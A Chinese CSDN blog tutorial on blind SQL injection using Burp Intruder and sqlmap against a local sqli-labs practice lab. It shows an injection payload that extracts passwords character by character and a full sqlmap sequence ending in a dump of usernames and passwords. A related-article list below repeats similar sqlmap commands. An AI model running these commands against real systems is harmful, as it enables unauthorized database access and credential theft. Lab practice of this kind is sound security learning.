【工具跑SQL盲注】

最新推荐文章于 2024-07-24 18:00:00 发布
最新推荐文章于 2024-07-24 18:00:00 发布
阅读量1.4k 收藏 13
点赞数 2
文章标签: web安全 安全 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53079406/article/details/125101545
版权

目录

一、(工具)burp跑盲注

1.1、方法一:爆破

1.2、方法二:注入语句爆破

二、(工具)sqlmap跑布尔盲注

2.1、命令:

2.2、利用过程:

第一步:检测是否存在注入

 第二步:爆数据库名

 第三步:爆数据库表名

 第四步:爆字段名

 第五步:爆数据

 三、推荐

一、(工具)burp跑盲注

1.1、方法一:爆破

抓包之后,将请求发送到"Intruder"模块

设置2个有效载荷

 

1.2、方法二:注入语句爆破

注入构造语句,进行迭代操作

(select case when '§0§' = lower(substring((select password from employees where empid=1),§1§,1)) then 1 else 0 end)

二、(工具)sqlmap跑布尔盲注

2.1、命令:

-u 指定注入点

--dbs 跑库 名

--tables 跑表 名

--columns 跑字段 名

--dump 枚举数据

跑出对应的后,依次加上-D 指定库 -T 指定表 -C 指定字段

2.2、利用过程:

第一步:检测是否存在注入

基础操作

python sqlmap.py http://localhost:8080/sqli-labs-master/Less-5/?id=1 --batch

--batch是使用默认设置

其实环境都扫出来了 

就可以再加上--dbms mysql了

 第二步:爆数据库名

命令

#获取全部数据库

sqlmap.py -u url --dbs --batch

---------

#获取当前数据库

sqlmap.py -u url --current-dbs --batch

基础操作

python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' --dbs --batch

 

 第三步:爆数据库表名

命令

python sqlmap.py -u url -D DB --tables --batch

基础操作

python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security --tables --batch

 

 第四步:爆字段名

命令:

sqlmap.py -u url -D DB -T TBL --columns --batch

基础操作

python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security -T users --columns --batch

 第五步:爆数据

命令:

sqlmap.py -u url -D DB -T TBL -C "COL1,COL2" --dump --batch

基础操作:

python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security -T users -C "username,password" --dump --batch

 

 三、推荐

【SQL注入-无回显】布尔盲注:原理、函数、利用过程

【SQL注入-有回显】DNS请求注入:原理、平台、使用过程、配置

黑色地带(崛起)
关注
python编写的sql盲注
10-28
python编写的sql盲注
Sqlmap的基本用法
m0_74989372的博客
04-12 975
id=1 -C"username,password" --dump -T users -D security)爆指定数据库的表 (python sqlmap.py -u 127.0.0.1:8080/sqlilabs/Less-1/?爆数据库 (python sqlmap.py -u 127.0.0.1:8080/sqlilabs/Less-1/?爆所有表 (python sqlmap.py -u 127.0.0.1:8080/sqlilabs/Less-1/?用sql注入靶场进行演示。
最受欢迎的十款SQL注入工具
2301_77472496的博客
08-28 5510
为了帮助大家更好的学习网络安全,小编给大家准备了一份网络安全入门/进阶学习资料,里面的内容都是适合零基础小白的笔记和资料,不懂编程也能听懂、看懂,所有资料共282G,朋友们如果有需要全套网络安全入门+进阶学习资源包,可以点击免费领取(如遇扫码问题,可以在评论区留言领取哦)~《网络安全入门+进阶学习资源包》CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享网络安全源码合集+工具包​​。
Hakuin:一款自动化SQL盲注(BSQLI)安全检测工具
最新发布
FreeBuf_的博客
07-24 2219
Hakuin是一款功能强大的SQL盲注漏洞安全检测工具,该工具专门针对BSQLi设计,可以帮助广大研究人员优化BSQLi测试用例,并以自动化的形式完成针对目标Web应用程序的漏洞扫描与检测任务。该工具允许用户以轻松高效的形式对目标Web应用程序执行BSQLi安全检测,并采用了多种优化方法,包括预训练和自适应语言模型、机会性猜测和并行性机制等。由于该工具基于Python 3开发,因此我们首先需要在本地设备上安装并配置好最新版本的Python 3环境。本项目的开发与发布遵循。
SQL注入--利用sqlmap工具注入
weixin_52151447的博客
11-18 2339
1、判断是否注入,进入cmd输入sqlmap.py -u
sqlmap 盲注使用
devil8123665的博客
04-17 7059
sql盲注 sqlmap.py -u "http://192.168.190.159/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=vdc32duqf2vlc92tepq3fvfp70" --technique B --dbs --batch 通过上文...
Kali渗透测试之DVWA系列(四)——使用Burp Suite进行SQL Injection(Blind)(SQL盲注,包括盲注脚本)
weixin_45116657的博客
08-25 4922
目录: 一、SQL盲注 SQL盲注SQL注入的区别; SQL盲注的过程; 二、实验环境 三、实验过程 基于布尔值的盲注; 基于时间的盲注; 一、SQL盲注简介 1、SQL盲注盲注SQL Injection(Blind),即SQL盲注,目标只会回复是或不是,没有详细内容; 注入:可以查看详细的内容 2、手工盲注思路: 手工盲注的过程,就像你和机器人聊天一样,这个机器人知道的...
SQL盲注利用工具
11-15
在这种情况下,我们讨论的是一款名为"BSQLInjector"的工具,它是由Ruby编程语言编写的,专门用于执行SQL盲注攻击。 首先,我们需要理解SQL注入的基本原理。当Web应用程序没有正确地过滤或转义用户输入的数据时,...
BurpSuite辅助SQL盲注安装教程
03-10
BurpSuite辅助SQL盲注安装教程
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注,Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
sql盲注检测的简单脚本.zip
03-10
这个"sql盲注检测的简单脚本.zip"压缩包很可能包含了用于检测这种安全问题的脚本工具SQL盲注的基本原理是利用Web应用对用户输入数据的不当处理。如果一个应用直接将用户输入的参数拼接到SQL查询中,而没有进行...
深谈SQL注入(进阶篇:盲注
2301_76251460的博客
04-14 877
SQL盲注
网安入门05-Sql注入(布尔盲注&SqlMap
m0_61499194的博客
12-13 1398
常规:python sqlmap.py -u"127.0.0.1/sqllabs/Less-5/?id=1" python sqlmap.py -u"127.0.0.1/sqllabs/Less-5/?id=1" --tables -D security
Sqlmap使用-盲注小实验
weixin_50339832的博客
06-03 6526
sqlmap简介 sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。 4、联合查询注入,可以使用union的情况下的注入。 5、堆查询注入,可以同时执行多条语句的执行时的注入。 ...
sqlmap如何进行时间盲注的爆破
weixin_35749786的博客
12-20 412
SQLMap是一个开源的渗透测试工具,它可以用来执行自动化的SQL注入攻击。在进行时间盲注攻击时,SQLMap会尝试通过构造特殊的SQL语句来猜测数据库中的数据。 要使用SQLMap进行时间盲注攻击,需要在命令行中输入以下命令: sqlmap -u URL--dbms=DBMS --time-sec=TIMESEC --technique=T --threads=THREADS ...
SQL注入-盲注 Burp盲注方法
HAKUNAMATATATTA的博客
09-04 747
什么是盲注?有时目标存在注入,但在页面上没有如何回显,此时,我们需要利用一些方法进行判断或者尝试得到数据,这个过程称之为盲注
SQL注入之路之二:布尔型(boolean)盲注
weixin_62715196的博客
08-10 1303
简单描述什么是布尔型盲注以及对与布尔型盲注如何进行注入,通过使用SQLmap自动化工具和人工结合burp suite两种方式讲述如何进行简单注入,并通过对DVWA靶场进行实操来验证手工结合burp suite实现布尔型注入的合理性
关于SQL时间盲注(基于sleep函数)的手动测试、burpsuite爆破、sqlmap全自动化注入
Welcome To Myon'Blog !
12-27 3169
这么说吧:一般sqlmap出来的基本上都没啥问题,这种是不存在什么绕过和过滤的,一般存在过和过滤的,sqlmap基本上都不出来,需要手工注入。SQL时间注入是一种常见的SQL注入攻击方式,攻击者通过在SQL语句中注入时间相关的代码,来获取敏感信息或者执行非法操作。攻击者可以根据SQL语句的执行时间,来推断出数据库中存储的信息,如用户名、密码等,从而获取敏感信息或者执行非法操作。6.09s,和我们设置的sleep 5s 差不多,说明sleep语句被执行了,存在时间盲注
安全中级11:sql注入+联合、报错、时间盲注+sqlmap使用
weixin_62870380的博客
07-02 4536
sql注入的原理和流程,以及联合注入、报错注入、时间盲注、布尔盲注以及sqlmap使用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

黑色地带(崛起)

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值